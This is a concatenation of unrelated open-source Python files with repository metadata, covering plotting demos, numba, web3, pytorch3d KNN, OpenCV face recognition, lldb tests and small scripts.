"""Wraps the source sequence in order to run its observer callbacks
on the specified scheduler.
Keyword arguments:
scheduler -- Scheduler to notify observers on.
Returns the source sequence whose observations happen on the
specified scheduler.
This only invokes observer callbacks on a scheduler. In case the
subscription and/or unsubscription actions have side-effects
that require to be run on a scheduler, use subscribe_on.
"""
def subscribe(observer, _=None):
return source.subscribe(ObserveOnObserver(scheduler, observer))
return AnonymousObservable(subscribe)
| [
"[email protected]"
] | |
44f00df1320decf7dfa7e83714f2c1c267a32738 | 9d461bb7e7db942654a819fd544dd6e59e671841 | /gui_test.py | 179acc4ff415a686fb2d97162ac3584cbf8d961d | [] | no_license | vimcoper/qt_candle_chart | 193644057a43ef068292f2bd61e713530485f8e9 | 205c493e3e374562142eaac9992f73be9e0b9d98 | refs/heads/master | 2022-07-19T09:03:31.396671 | 2020-05-25T08:19:57 | 2020-05-25T08:19:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,135 | py | import sys
import time
import numpy as np
from matplotlib.backends.qt_compat import QtCore, QtWidgets, is_pyqt5
if is_pyqt5():
from matplotlib.backends.backend_qt5agg import (
FigureCanvas, NavigationToolbar2QT as NavigationToolbar)
else:
from matplotlib.backends.backend_qt4agg import (
FigureCanvas, NavigationToolbar2QT as NavigationToolbar)
from matplotlib.figure import Figure
class ApplicationWindow(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self._main = QtWidgets.QWidget()
print(self._main)
self.setCentralWidget(self._main)
layout = QtWidgets.QVBoxLayout(self._main)
static_canvas = FigureCanvas(Figure(figsize=(5, 3)))
layout.addWidget(static_canvas)
# self.addToolBar(NavigationToolbar(static_canvas, self))
dynamic_canvas = FigureCanvas(Figure(figsize=(5, 3)))
layout.addWidget(dynamic_canvas)
# self.addToolBar(QtCore.Qt.BottomToolBarArea,
# NavigationToolbar(dynamic_canvas, self))
self._static_ax = static_canvas.figure.subplots()
t = np.linspace(0, 10, 501)
self._static_ax.plot(t, np.tan(t), ".")
self._dynamic_ax = dynamic_canvas.figure.subplots()
self._timer = dynamic_canvas.new_timer(
50, [(self._update_canvas, (), {})])
self._timer.start()
def _update_canvas(self):
self._dynamic_ax.clear()
t = np.linspace(0, 10, 101)
# Use fixed vertical limits to prevent autoscaling changing the scale
# of the axis.
self._dynamic_ax.set_ylim(-1.1, 1.1)
# Shift the sinusoid as a function of time.
self._dynamic_ax.plot(t, np.sin(t + time.time()))
self._dynamic_ax.figure.canvas.draw()
if __name__ == "__main__":
# Check whether there is already a running QApplication (e.g., if running
# from an IDE).
qapp = QtWidgets.QApplication.instance()
if not qapp:
qapp = QtWidgets.QApplication(sys.argv)
app = ApplicationWindow()
app.show()
app.activateWindow()
app.raise_()
qapp.exec_() | [
"[email protected]"
] | |
1e257cc346957e4e15add00df2f9cfc675ebce1c | 61a72b019346d10c502f7ed4d4894adbfe03c8cb | /legacy/structures.py | fd6f19c85c10d4ae631646b1bc26fe6ea01bdf4c | [
"BSD-2-Clause"
] | permissive | numba/numba-examples | 10617ced993e1f756595152711c1b6abe8d180a9 | c423f5419a459f5ab8874fda6d39bb5ea05d04b2 | refs/heads/master | 2023-08-23T15:33:21.729427 | 2022-06-27T22:54:27 | 2022-06-27T22:54:27 | 96,823,247 | 168 | 62 | BSD-2-Clause | 2022-09-29T19:24:53 | 2017-07-10T21:32:44 | Jupyter Notebook | UTF-8 | Python | false | false | 547 | py | #!/usr/bin/env python
from __future__ import print_function, division, absolute_import
import numpy as np
from numba import jit
record_type = np.dtype([('x', np.double), ('y', np.double)])
a = np.array([(1.0, 2.0), (3.0, 4.0)], dtype=record_type)
@jit
def hypot(data):
result = np.empty_like(data, dtype=np.float64)
# notice access to structure elements 'x' and 'y' via attribute access
for i in range(data.shape[0]):
result[i] = np.sqrt(data[i].x * data[i].x + data[i].y * data[i].y)
return result
print(hypot(a))
| [
"[email protected]"
] | |
ea5cf27bff17dbb8236475b3e8ee6c32c4dfa01f | 5c928e2b5024920d26c93f4b06e93c08a3e61294 | /portal_rnaseq_galaxy/scripts/api/copy_history_dataset_to_history.py | ec02564972b8186fd5dc669fbf1280a839f997fa | [
"CC-BY-2.5",
"AFL-2.1",
"AFL-3.0",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | BioinformaticsArchive/PathogenPortal | c390cf78299595d170b20a105afdd5200200ddaf | d4b1e525e7e91ce32ec29998a7bcb5a1415706a3 | refs/heads/master | 2021-01-22T12:49:48.599355 | 2013-08-13T16:16:13 | 2013-08-13T16:16:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | #!/usr/bin/env python
import os, sys
sys.path.insert( 0, os.path.dirname( __file__ ) )
from common import submit
try:
assert sys.argv[3]
data = {}
data['from_hda_id'] = sys.argv[3]
except IndexError:
print 'usage: %s key url hda_file_id' % os.path.basename( sys.argv[0] )
print ' library_file_id is from /api/libraries/<library_id>/contents/<library_file_id>'
sys.exit( 1 )
submit( sys.argv[1], sys.argv[2], data )
| [
"[email protected]"
] | |
bf5c50208a3d1421abd348492423884ea0e9bb6f | 60317dc519af01c33a9b0f507924fd51c44541df | /iMii_v9/venv/bin/pygmentize | 1c281685d51694efc96f7519d8d42ff5271f05da | [] | no_license | Durant21/iMii_v9 | b538450c8a9e7ca1c852270c2641f91083bd4270 | 338ff9adab7b0d794d84553f7cf380ac10e47761 | refs/heads/master | 2022-10-12T16:03:16.931696 | 2019-07-08T02:54:03 | 2019-07-08T02:54:03 | 195,724,107 | 0 | 1 | null | 2022-10-10T17:32:12 | 2019-07-08T02:40:19 | Python | UTF-8 | Python | false | false | 406 | #!/home/dante/Projects/iMii/v9/iMii_v9/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'Pygments','console_scripts','pygmentize'
__requires__ = 'Pygments'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('Pygments', 'console_scripts', 'pygmentize')()
)
| [
"[email protected]"
] | ||
4a2caa48c63041ee507c0375de604edc7effa7d2 | cc6a674cab1dc959189b9edff975625f4815bc1c | /Transformers-from-scratch/examples/set_context.py | 2317e03224a6ee1213b8d2ce86f2a61db92c7e66 | [
"MIT"
] | permissive | shreyansh26/DL-Code-Repository | 15173042f566ea42f96eb65283347927a2fab4ff | f1974eedc1fef54b2d274703390a22721e46f502 | refs/heads/master | 2023-07-15T23:15:05.484609 | 2021-08-30T15:41:20 | 2021-08-30T15:41:20 | 382,834,342 | 0 | 0 | null | 2021-07-04T12:11:08 | 2021-07-04T11:27:13 | Python | UTF-8 | Python | false | false | 203 | py | import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../tfb')))
import tfb | [
"[email protected]"
] | |
ae0760e8766262053cf1d4a77e9a84e482e76efa | 9f714608155e7f8b92cea3dd4bda78f3ac1f56a2 | /Resume/put_item.py | a58e932cec941fad48372545f0eed3a34fb0491c | [] | no_license | yenkuanlee/FoodResume | 0258dbaf29ac3efc864b47b70fdc14b8acc37dac | 2e7bff23235d569cf4caaba86f956b1bad749082 | refs/heads/master | 2020-03-20T23:58:25.545722 | 2018-07-09T04:12:37 | 2018-07-09T04:12:37 | 137,871,950 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 839 | py | # -*- coding: utf-8 -*-
import json
from web3 import Web3, HTTPProvider, TestRPCProvider
from web3.contract import ConciseContract
import os
import sys
Cpath = os.path.dirname(os.path.realpath(__file__))
host = 'localhost'
#account = '0x42946c2bb22ad422e7366d68d3ca07fb1862ff36' ## supplier
account = '0xe6ab871f860d9f28764d5d2e0672396a7643710e' ## gmeal
passwd = '123'
# web3.py instance
w3 = Web3(HTTPProvider('http://'+host+':3000'))
w3.personal.unlockAccount(account,passwd)
f = open(Cpath+'/resume.json','r')
line = f.readline()
Jline = json.loads(line)
f.close()
abi = Jline['abi']
contract_address = Jline['contract_address']
# Contract instance in concise mode
contract_instance = w3.eth.contract(abi, contract_address, ContractFactoryClass=ConciseContract)
contract_instance.Record(sys.argv[1],transact={'from': account})
| [
"[email protected]"
] | |
1b73f4236d71f8b4f37038833d494e5d23ba0b35 | 87b904ebf11d416567a7e49b91b8e9934f67c6f3 | /show_df_as_html_table.py | d8dd6bfadb056408f98c24475be1fe9ce25d2c20 | [
"MIT"
] | permissive | NathanKr/pandas-playground | a701f524aa48f22f6680e48c597206e10f8222e5 | a5355c59cb61ca3a7dcce590ed42d56a6b943783 | refs/heads/main | 2023-06-05T11:07:52.061327 | 2021-07-02T02:35:15 | 2021-07-02T02:35:15 | 328,917,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import pandas as pd
import os
url = 'https://en.wikipedia.org/wiki/List_of_S%26P_500_companies'
snp500_df = pd.read_html(url)[0]
file_path = os.path.join('temp','snp500_df_to_html.html')
print(f'write snp500_df to {file_path}')
snp500_df.to_html(file_path)
| [
"[email protected]"
] | |
a59830d94f066732fabbf3056710ff933a7aef39 | dddbc7dea28cc36fb110f83acbc4b6290c9dea2d | /Final/playground.py | 88ae3ba8f2832e52c36bc0d0c8f6f3411df0c682 | [] | no_license | rubcuadra/TC2025_PA | 82551d6b10a214b99a4d7110492c7c0c01188eed | 1893e1950709db009933d3f9ae9a84e9d8354241 | refs/heads/master | 2020-03-27T15:06:26.398245 | 2018-11-28T00:28:26 | 2018-11-28T00:28:26 | 146,698,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | from onitampy.board import OnitamaBoard
from onitampy.movements import OnitamaCards,DECK_INDEXES
if __name__ == '__main__':
board = OnitamaBoard()
# print(board)
board.cards[0].pop()
board.cards[0].pop()
board.cards[0].add('EEL')
board.cards[0].add('COBRA')
board.cards[1].pop()
board.cards[1].pop()
board.cards[1].add('GOOSE')
board.cards[1].add('CRAB')
print(board.canMove( board.BLUE, (4,2),"EEL",(3,1))) | [
"[email protected]"
] | |
1c255e182e83fd5efcc23f3fcd88ce421d2cfc4b | ff58ba25d940ed34d9684efab04adef85d1e1c0f | /src/management/__init__.py | 1cef4964de4e5953fc495c1d642a6ac0fde493ef | [] | no_license | afsmith/Kneto-Sello | e9046a81ff83652531adc55aab3f90f77af5b5be | a1b12daf8a04ef485ddcaa2944b2d87878a8cdd0 | refs/heads/master | 2021-03-27T17:31:23.830989 | 2013-06-04T07:29:58 | 2013-06-04T07:29:58 | 6,720,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2010 BLStream Sp. z o.o. (http://blstream.com/)
#
# Authors:
# Marek Mackiewicz <[email protected]>
#
"""Application for user management.
This application handles management of users and their permissions.
"""
# vim: set et sw=4 ts=4 sts=4 tw=78: | [
"[email protected]"
] | |
d2df797bf59936294a95a37b0c05d5cde507fd78 | 78137d5e4e688749399bbb386b26536e4ac6d9fa | /pytorch3d/ops/knn.py | 72e3c28959b15d4b4cf7e2ae55fa45530c2401de | [
"MIT",
"BSD-3-Clause"
] | permissive | bruinxiong/pytorch3d | 4235681c6356f7e69fa506d8474a3c7cf83d9fe6 | 18a3c5cbb9055bcda44590d39db65bb0c74db799 | refs/heads/master | 2022-06-18T16:28:39.589229 | 2022-05-18T20:11:36 | 2022-05-18T20:11:36 | 238,892,798 | 0 | 0 | NOASSERTION | 2022-05-18T20:11:37 | 2020-02-07T10:04:39 | Python | UTF-8 | Python | false | false | 10,403 | py | # Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from collections import namedtuple
from typing import Union
import torch
from pytorch3d import _C
from torch.autograd import Function
from torch.autograd.function import once_differentiable
_KNN = namedtuple("KNN", "dists idx knn")
class _knn_points(Function):
"""
Torch autograd Function wrapper for KNN C++/CUDA implementations.
"""
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
ctx,
p1,
p2,
lengths1,
lengths2,
K,
version,
norm: int = 2,
return_sorted: bool = True,
):
"""
K-Nearest neighbors on point clouds.
Args:
p1: Tensor of shape (N, P1, D) giving a batch of N point clouds, each
containing up to P1 points of dimension D.
p2: Tensor of shape (N, P2, D) giving a batch of N point clouds, each
containing up to P2 points of dimension D.
lengths1: LongTensor of shape (N,) of values in the range [0, P1], giving the
length of each pointcloud in p1. Or None to indicate that every cloud has
length P1.
lengths2: LongTensor of shape (N,) of values in the range [0, P2], giving the
length of each pointcloud in p2. Or None to indicate that every cloud has
length P2.
K: Integer giving the number of nearest neighbors to return.
version: Which KNN implementation to use in the backend. If version=-1,
the correct implementation is selected based on the shapes of the inputs.
norm: (int) indicating the norm. Only supports 1 (for L1) and 2 (for L2).
return_sorted: (bool) whether to return the nearest neighbors sorted in
ascending order of distance.
Returns:
p1_dists: Tensor of shape (N, P1, K) giving the squared distances to
the nearest neighbors. This is padded with zeros both where a cloud in p2
has fewer than K points and where a cloud in p1 has fewer than P1 points.
p1_idx: LongTensor of shape (N, P1, K) giving the indices of the
K nearest neighbors from points in p1 to points in p2.
Concretely, if `p1_idx[n, i, k] = j` then `p2[n, j]` is the k-th nearest
neighbors to `p1[n, i]` in `p2[n]`. This is padded with zeros both where a cloud
in p2 has fewer than K points and where a cloud in p1 has fewer than P1 points.
"""
if not ((norm == 1) or (norm == 2)):
raise ValueError("Support for 1 or 2 norm.")
idx, dists = _C.knn_points_idx(p1, p2, lengths1, lengths2, norm, K, version)
# sort KNN in ascending order if K > 1
if K > 1 and return_sorted:
if lengths2.min() < K:
P1 = p1.shape[1]
mask = lengths2[:, None] <= torch.arange(K, device=dists.device)[None]
# mask has shape [N, K], true where dists irrelevant
mask = mask[:, None].expand(-1, P1, -1)
# mask has shape [N, P1, K], true where dists irrelevant
dists[mask] = float("inf")
dists, sort_idx = dists.sort(dim=2)
dists[mask] = 0
else:
dists, sort_idx = dists.sort(dim=2)
# pyre-fixme[16]: `Tensor` has no attribute `gather`.
idx = idx.gather(2, sort_idx)
ctx.save_for_backward(p1, p2, lengths1, lengths2, idx)
ctx.mark_non_differentiable(idx)
ctx.norm = norm
return dists, idx
@staticmethod
@once_differentiable
def backward(ctx, grad_dists, grad_idx):
p1, p2, lengths1, lengths2, idx = ctx.saved_tensors
norm = ctx.norm
# TODO(gkioxari) Change cast to floats once we add support for doubles.
if not (grad_dists.dtype == torch.float32):
grad_dists = grad_dists.float()
if not (p1.dtype == torch.float32):
p1 = p1.float()
if not (p2.dtype == torch.float32):
p2 = p2.float()
grad_p1, grad_p2 = _C.knn_points_backward(
p1, p2, lengths1, lengths2, idx, norm, grad_dists
)
return grad_p1, grad_p2, None, None, None, None, None, None
def knn_points(
p1: torch.Tensor,
p2: torch.Tensor,
lengths1: Union[torch.Tensor, None] = None,
lengths2: Union[torch.Tensor, None] = None,
norm: int = 2,
K: int = 1,
version: int = -1,
return_nn: bool = False,
return_sorted: bool = True,
) -> _KNN:
"""
K-Nearest neighbors on point clouds.
Args:
p1: Tensor of shape (N, P1, D) giving a batch of N point clouds, each
containing up to P1 points of dimension D.
p2: Tensor of shape (N, P2, D) giving a batch of N point clouds, each
containing up to P2 points of dimension D.
lengths1: LongTensor of shape (N,) of values in the range [0, P1], giving the
length of each pointcloud in p1. Or None to indicate that every cloud has
length P1.
lengths2: LongTensor of shape (N,) of values in the range [0, P2], giving the
length of each pointcloud in p2. Or None to indicate that every cloud has
length P2.
norm: Integer indicating the norm of the distance. Supports only 1 for L1, 2 for L2.
K: Integer giving the number of nearest neighbors to return.
version: Which KNN implementation to use in the backend. If version=-1,
the correct implementation is selected based on the shapes of the inputs.
return_nn: If set to True returns the K nearest neighbors in p2 for each point in p1.
return_sorted: (bool) whether to return the nearest neighbors sorted in
ascending order of distance.
Returns:
dists: Tensor of shape (N, P1, K) giving the squared distances to
the nearest neighbors. This is padded with zeros both where a cloud in p2
has fewer than K points and where a cloud in p1 has fewer than P1 points.
idx: LongTensor of shape (N, P1, K) giving the indices of the
K nearest neighbors from points in p1 to points in p2.
Concretely, if `p1_idx[n, i, k] = j` then `p2[n, j]` is the k-th nearest
neighbors to `p1[n, i]` in `p2[n]`. This is padded with zeros both where a cloud
in p2 has fewer than K points and where a cloud in p1 has fewer than P1
points.
nn: Tensor of shape (N, P1, K, D) giving the K nearest neighbors in p2 for
each point in p1. Concretely, `p2_nn[n, i, k]` gives the k-th nearest neighbor
for `p1[n, i]`. Returned if `return_nn` is True.
The nearest neighbors are collected using `knn_gather`
.. code-block::
p2_nn = knn_gather(p2, p1_idx, lengths2)
which is a helper function that allows indexing any tensor of shape (N, P2, U) with
the indices `p1_idx` returned by `knn_points`. The output is a tensor
of shape (N, P1, K, U).
"""
if p1.shape[0] != p2.shape[0]:
raise ValueError("pts1 and pts2 must have the same batch dimension.")
if p1.shape[2] != p2.shape[2]:
raise ValueError("pts1 and pts2 must have the same point dimension.")
p1 = p1.contiguous()
p2 = p2.contiguous()
P1 = p1.shape[1]
P2 = p2.shape[1]
if lengths1 is None:
lengths1 = torch.full((p1.shape[0],), P1, dtype=torch.int64, device=p1.device)
if lengths2 is None:
lengths2 = torch.full((p1.shape[0],), P2, dtype=torch.int64, device=p1.device)
# pyre-fixme[16]: `_knn_points` has no attribute `apply`.
p1_dists, p1_idx = _knn_points.apply(
p1, p2, lengths1, lengths2, K, version, norm, return_sorted
)
p2_nn = None
if return_nn:
p2_nn = knn_gather(p2, p1_idx, lengths2)
return _KNN(dists=p1_dists, idx=p1_idx, knn=p2_nn if return_nn else None)
def knn_gather(
x: torch.Tensor, idx: torch.Tensor, lengths: Union[torch.Tensor, None] = None
):
"""
A helper function for knn that allows indexing a tensor x with the indices `idx`
returned by `knn_points`.
For example, if `dists, idx = knn_points(p, x, lengths_p, lengths, K)`
where p is a tensor of shape (N, L, D) and x a tensor of shape (N, M, D),
then one can compute the K nearest neighbors of p with `p_nn = knn_gather(x, idx, lengths)`.
It can also be applied for any tensor x of shape (N, M, U) where U != D.
Args:
x: Tensor of shape (N, M, U) containing U-dimensional features to
be gathered.
idx: LongTensor of shape (N, L, K) giving the indices returned by `knn_points`.
lengths: LongTensor of shape (N,) of values in the range [0, M], giving the
length of each example in the batch in x. Or None to indicate that every
example has length M.
Returns:
x_out: Tensor of shape (N, L, K, U) resulting from gathering the elements of x
with idx, s.t. `x_out[n, l, k] = x[n, idx[n, l, k]]`.
If `k > lengths[n]` then `x_out[n, l, k]` is filled with 0.0.
"""
N, M, U = x.shape
_N, L, K = idx.shape
if N != _N:
raise ValueError("x and idx must have same batch dimension.")
if lengths is None:
lengths = torch.full((x.shape[0],), M, dtype=torch.int64, device=x.device)
idx_expanded = idx[:, :, :, None].expand(-1, -1, -1, U)
# idx_expanded has shape [N, L, K, U]
x_out = x[:, :, None].expand(-1, -1, K, -1).gather(1, idx_expanded)
# p2_nn has shape [N, L, K, U]
needs_mask = lengths.min() < K
if needs_mask:
# mask has shape [N, K], true where idx is irrelevant because
# there is less number of points in p2 than K
mask = lengths[:, None] <= torch.arange(K, device=x.device)[None]
# expand mask to shape [N, L, K, U]
mask = mask[:, None].expand(-1, L, -1)
mask = mask[:, :, :, None].expand(-1, -1, -1, U)
x_out[mask] = 0.0
return x_out
| [
"[email protected]"
] | |
885b4a9b841ec2f7c0f895d76b18602485199964 | 846b11ccf549aba144c1824a24292a4850860ca7 | /5-ExerciciosFuncoes/4.py | dcb657a9902f0c3fd3e9da6f637323357681ce71 | [] | no_license | paulocesarcsdev/ExerciciosPython | 6d1feff293e7efc4cd3fbc62eee0add93f76db99 | 25bfaa6dc5cb294242e478a2b253a8ca5d9c7078 | refs/heads/master | 2023-05-15T00:53:22.151884 | 2021-06-10T03:04:04 | 2021-06-10T03:04:04 | 337,847,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py | '''
Faça um programa, com uma função que necessite de um argumento.
A função retorna o valor de caractere ‘P’, se seu argumento for positivo, e ‘N’, se seu argumento for zero ou negativo.
'''
def peso(valor):
if valor % 2 == 0:
return " 'P' "
else:
return " 'N' "
numero = int(input('Entre o o valor: '))
print(peso(numero)) | [
"[email protected]"
] | |
148b5b1f7ca8a9c5547ea64c99330d158348a5a4 | 9ac6fda4872f67faf8ce3cb541f10cea692e72ee | /main.py | 28467183158d45176c947599464a73fb8bbdd146 | [] | no_license | markbirds/OpenCV-Face-Recognition | 4db776d286313d9d93d464a4bce131add1f0921a | f486e3e0e37c4cd6cb23818a17f09194bfd9582e | refs/heads/master | 2023-02-08T01:01:22.442349 | 2021-01-04T13:06:45 | 2021-01-04T13:06:45 | 326,679,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,246 | py | import numpy as np
import cv2
import json
# loading features to be used for face detection
face_cascade = cv2.CascadeClassifier('src/haar_cascades/haarcascade_frontalface_default.xml')
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.read("./src/recognizer/face_trained.yml")
with open('./src/recognizer/registered_faces.json') as f:
registered_faces = json.load(f)['registered_faces']
# capture live feed from webcam
cap = cv2.VideoCapture(0)
while(True):
# read frames and covert to grayscale
ret, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# get coordinates of faces
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
# draw rectangle around face roi
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)
face_roi_gray = gray[y:y+h, x:x+w]
id_, conf = face_recognizer.predict(face_roi_gray)
font = cv2.FONT_HERSHEY_SIMPLEX
name = registered_faces[id_]
color = (255, 255, 255)
stroke = 2
cv2.putText(frame, name, (x,y-20), font, 1, color, stroke, cv2.LINE_AA)
# display resulting frame
cv2.imshow('Face detection',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows() | [
"[email protected]"
] | |
402d662f1e8116b3c4afdf8427dc4cddb4b05546 | 2d276785c3663d4798be462115291c4706dbd255 | /Python从菜鸟到高手/chapter5/demo5.04.py | 5cbb5b358fee5ddbaa83e6d82be4b05bab815d51 | [] | no_license | bupthl/Python | 81c92433bd955663e6cda5fe7cab5ea3d067c3de | bdb33aeeb179a43100b9ef7129a925c63a133fd3 | refs/heads/master | 2022-02-21T11:02:40.195265 | 2019-08-16T05:49:18 | 2019-08-16T05:49:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,689 | py | '''
--------《Python从菜鸟到高手》源代码------------
欧瑞科技版权所有
作者:李宁
如有任何技术问题,请加QQ技术讨论群:264268059
或关注“极客起源”订阅号或“欧瑞科技”服务号或扫码关注订阅号和服务号,二维码在源代码根目录
如果QQ群已满,请访问https://geekori.com,在右侧查看最新的QQ群,同时可以扫码关注公众号
“欧瑞学院”是欧瑞科技旗下在线IT教育学院,包含大量IT前沿视频课程,
请访问http://geekori.com/edu或关注前面提到的订阅号和服务号,进入移动版的欧瑞学院
“极客题库”是欧瑞科技旗下在线题库,请扫描源代码根目录中的小程序码安装“极客题库”小程序
关于更多信息,请访问下面的页面
https://geekori.com/help/videocourse/readme.html
'''
# 引用string模块中的Template类
from string import Template
template1 = Template("$s是我最喜欢的编程语言, $s非常容易学习,而且功能强大")
# 指定格式化参数s的值是Python
print(template1.substitute(s='Python'))
# 当格式化参数是一个字符串的一部分时,为了和字符串的其他部分区分开,
# 需要用一对大括号将格式化参数变量括起来
template2 = Template("${s}stitute")
print(template2.substitute(s='sub'))
template3 = Template("$dollar$$相当于多少$pounds")
# 替换两个格式化参数变量
print(template3.substitute(dollar=20,pounds='英磅'))
template4 = Template("$dollar$$相当于多少$pounds")
data = {}
data['dollar'] = 100
data['pounds'] = '英磅'
# 使用字典指定格式化参数值
print(template4.substitute(data))
| [
"[email protected]"
] | |
4649a07a27a686ce6bfe64cbce1f3e49493be5e0 | 23bfacd796850e9e2766bf3db3dcdfb640aa9cf4 | /anamdesktop/entry.py | 75ca190d87ad46083c09260be33ead5581aeadf0 | [] | no_license | yeleman/anam-desktop | f223e77099c4ca261414e19746ef8237dfcada32 | eefac7f58c84964b7871addffe5cc3201a299ae0 | refs/heads/master | 2021-03-12T17:54:27.987963 | 2020-10-22T18:56:34 | 2020-10-22T18:56:34 | 91,448,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
import sys
from PyQt5 import QtWidgets, QtCore
from anamdesktop import setlocale, logger
from anamdesktop.ui.main import MainWindow
def destroy():
logger.info("Exiting Application")
QtCore.QCoreApplication.instance().quit
sys.exit(0)
def main():
logger.info("Starting Application")
app = QtWidgets.QApplication(sys.argv)
app.lastWindowClosed.connect(destroy)
setlocale()
window = MainWindow()
window.reset()
window.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
31f593769f4303c41f20eafa27f63464428e87b0 | 829b0a557d3cc43a108f9b76d748e923fba8d928 | /lldb/packages/Python/lldbsuite/test/functionalities/breakpoint/source_regexp/TestSourceRegexBreakpoints.py | 2258989806066f4b103f6d06ed3b3d0720c6e638 | [
"NCSA",
"LLVM-exception",
"Apache-2.0"
] | permissive | ljh740/llvm-project | 31766f1f687939a679531d372d56755dbb5c415b | 89295aa3f2aebcd930e5ee7272ca47349bb7767d | refs/heads/sbingner/master | 2023-04-06T14:15:22.003403 | 2020-01-07T08:36:49 | 2020-01-07T08:36:49 | 255,562,403 | 0 | 0 | Apache-2.0 | 2021-04-15T14:56:23 | 2020-04-14T09:12:17 | null | UTF-8 | Python | false | false | 3,778 | py | """
Test lldb breakpoint setting by source regular expression.
This test just tests the source file & function restrictions.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestSourceRegexBreakpoints(TestBase):
mydir = TestBase.compute_mydir(__file__)
def test_location(self):
self.build()
self.source_regex_locations()
def test_restrictions(self):
self.build()
self.source_regex_restrictions()
def source_regex_locations(self):
""" Test that restricting source expressions to files & to functions. """
# Create a target by the debugger.
exe = self.getBuildArtifact("a.out")
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# First look just in main:
target_files = lldb.SBFileSpecList()
target_files.Append(lldb.SBFileSpec("a.c"))
func_names = lldb.SBStringList()
func_names.AppendString("a_func")
source_regex = "Set . breakpoint here"
main_break = target.BreakpointCreateBySourceRegex(
source_regex, lldb.SBFileSpecList(), target_files, func_names)
num_locations = main_break.GetNumLocations()
self.assertTrue(
num_locations == 1,
"a.c in a_func should give one breakpoint, got %d." %
(num_locations))
loc = main_break.GetLocationAtIndex(0)
self.assertTrue(loc.IsValid(), "Got a valid location.")
address = loc.GetAddress()
self.assertTrue(
address.IsValid(),
"Got a valid address from the location.")
a_func_line = line_number("a.c", "Set A breakpoint here")
line_entry = address.GetLineEntry()
self.assertTrue(line_entry.IsValid(), "Got a valid line entry.")
self.assertTrue(line_entry.line == a_func_line,
"Our line number matches the one lldbtest found.")
def source_regex_restrictions(self):
""" Test that restricting source expressions to files & to functions. """
# Create a target by the debugger.
exe = self.getBuildArtifact("a.out")
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# First look just in main:
target_files = lldb.SBFileSpecList()
target_files.Append(lldb.SBFileSpec("main.c"))
source_regex = "Set . breakpoint here"
main_break = target.BreakpointCreateBySourceRegex(
source_regex, lldb.SBFileSpecList(), target_files, lldb.SBStringList())
num_locations = main_break.GetNumLocations()
self.assertTrue(
num_locations == 2,
"main.c should have 2 matches, got %d." %
(num_locations))
# Now look in both files:
target_files.Append(lldb.SBFileSpec("a.c"))
main_break = target.BreakpointCreateBySourceRegex(
source_regex, lldb.SBFileSpecList(), target_files, lldb.SBStringList())
num_locations = main_break.GetNumLocations()
self.assertTrue(
num_locations == 4,
"main.c and a.c should have 4 matches, got %d." %
(num_locations))
# Now restrict it to functions:
func_names = lldb.SBStringList()
func_names.AppendString("main_func")
main_break = target.BreakpointCreateBySourceRegex(
source_regex, lldb.SBFileSpecList(), target_files, func_names)
num_locations = main_break.GetNumLocations()
self.assertTrue(
num_locations == 2,
"main_func in main.c and a.c should have 2 matches, got %d." %
(num_locations))
| [
"[email protected]"
] | |
41e1aa9d1cb1c62fe89cbc3761521eaf73dce401 | 498cc670e199d8d3da497b8350b845c0717c505e | /readit/__init__.py | 6723f5391c8b467acf39e926f77185ca47b08323 | [] | no_license | dave-shawley/readit | 1a0b24fb859f00c6fc415647028ab5ee27453328 | 2a05f1de29ddc18ccae81b866d3da5b0a10d0236 | refs/heads/master | 2020-05-14T14:51:47.951498 | 2013-02-06T01:57:03 | 2013-02-06T01:57:03 | 6,038,460 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 494 | py | # order is important here
from .helpers import LinkMap
from .reading import Reading
from .user import User
# flaskapp import required to be last since it depends on
# other readit exports
from .flaskapp import app, Application
class MoreThanOneResultError(Exception):
"""You will encounter me when a single instance is expected and more
than one is found or supplied."""
pass
__all__ = ['app', 'Application', 'LinkMap', 'MoreThanOneResultError',
'Reading', 'User']
| [
"[email protected]"
] | |
